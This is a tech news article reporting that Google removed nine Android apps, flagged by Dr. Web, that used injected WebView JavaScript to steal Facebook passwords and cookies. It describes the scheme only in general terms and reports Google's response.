The Google Play Store is generally the safest place to obtain apps for your Android smartphone, but every once in a while, some bad actors find their way in. Recently, Google removed a handful of Android apps from the Play Store that tried to steal Facebook passwords.
Dr. Web recently highlighted a “trojan” that was embedded within some Android apps that had the ability to trick users into giving up their Facebook password. Ten apps were observed using the software, most of which were actually available in the Google Play Store and had racked up a considerable number of downloads. The nine apps combined were downloaded over 6 million times.
The software worked by faking the Facebook login screen, making users think that the otherwise harmless app they were using required a Facebook account to function. After entering their password on the screen, the data was then stolen and gave the bad actor access to the unwitting user’s account.
With that, the displayed form was genuine. These trojans used a special mechanism to trick their victims. After receiving the necessary settings from one of the C&C servers upon launch, they loaded the legitimate Facebook web page https://www.facebook.com/login.php into WebView. Next, they loaded JavaScript received from the C&C server into the same WebView. This script was directly used to hijack the entered login credentials. After that, this JavaScript, using the methods provided through the JavascriptInterface annotation, passed stolen login and password to the trojan applications, which then transferred the data to the attackers’ C&C server. After the victim logged into their account, the trojans also stole cookies from the current authorization session. Those cookies were also sent to cybercriminals.
The apps in question included photo editing apps, “App Lock,” a fitness app, and horoscope applications. Some of the apps apparently used Google’s Flutter language. “PIP Photo” was the app that managed the most success, pulling 5.8 million downloads. The rest of the apps were marked as “more than 100,000” or less.
ArsTechnica found that all nine apps have been removed from the Play Store, with a Google spokesperson confirming that the bad actor’s developer accounts have also been banned. Google has also been taking steps to further secure the Play Store recently by adding security requirements for Google Play developers.
More on Android:
- Google Play System update install progress now displayed under boot animation
- Android App Bundles replacing APK format for new Google Play applications in August
- Google Play developers will need to enable 2-Step Verification and meet identity requirements
Author: Ben Schoon
Source: 9TO5Google
